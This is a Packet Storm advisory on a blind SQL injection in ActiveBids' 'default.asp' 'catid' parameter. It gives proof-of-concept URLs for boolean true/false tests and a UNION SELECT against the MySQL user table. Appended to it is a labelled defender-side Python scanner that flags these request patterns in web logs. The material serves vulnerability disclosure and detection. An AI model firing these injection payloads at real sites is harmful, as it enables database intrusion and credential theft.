ActiveBids Blind SQL Injection

2009-11-18T00:00:00
ID PACKETSTORM:82726
Type packetstorm
Reporter Hussin X
Modified 2009-11-18T00:00:00

Description

                                        
`ActiveBids (default.asp) Blind SQL Injection Vulnerability  
____________________________________  
  
Author : Hussin X  
  
Home : www.IQ-TY.com  
  
email : hussin.x@gmail.com  
____________________________________  
  
Vendor : http://www.activewebsoftwares.com  
Demo :  
_______  
  
http://server/default.asp?catid=39+and+1=1 ( true )  
  
http://server/default.asp?catid=39+and+1=0 ( false )  
  
:: test ::  
  
http://server/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+mysql.user  
  
Greetz :  
WwW.IQ-ty.CoM  
  
| CraCkEr | Cyber-Zone | str0ke | jiko   
`
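
A defender-side check for the request patterns shown above, added here as an example and not part of the original advisory: it scans web-server log lines for `catid` values sent to `default.asp` that are not plain integers and labels the boolean-test and UNION SELECT forms. The log field layout, the sample lines and all function names are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed log lines (not real traffic). Assumed field order:
# date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2009-11-18 10:00:01 192.0.2.10 GET /default.asp catid=39 200
2009-11-18 10:00:05 192.0.2.77 GET /default.asp catid=39+and+1=1 200
2009-11-18 10:00:06 192.0.2.77 GET /default.asp catid=39+and+1=0 200
2009-11-18 10:00:09 192.0.2.77 GET /default.asp catid=39+UNION%20SELECT%201,2,3+from+mysql.user 500
2009-11-18 10:00:12 192.0.2.10 GET /item.asp id=7 200
"""

INTEGER_RE = re.compile(r"[0-9]+")
BOOLEAN_RE = re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)
UNION_RE = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)


def classify(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if INTEGER_RE.fullmatch(value):
        return None
    if UNION_RE.search(value):
        return "union-select"
    if BOOLEAN_RE.search(value):
        return "boolean-test"
    return "non-numeric"


def scan(log_text, page="/default.asp", param="catid"):
    """Yield (client_ip, label, decoded_value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 7 or fields[4].lower() != page:
            continue
        # parse_qs decodes '+' and %XX, so encoded variants look the same here
        query = parse_qs(fields[5], keep_blank_values=True)
        for value in query.get(param, []):
            label = classify(value)
            if label:
                findings.append((fields[2], label, value))
    return findings


if __name__ == "__main__":
    for client, label, value in scan(SAMPLE_LOG):
        print(f"{client}\t{label}\t{value!r}")
```

Because the parameter is a category id, the same integer-only test used in `classify` is the server-side fix: reject or cast any `catid` that is not all digits before it reaches the query, or bind it as a parameter.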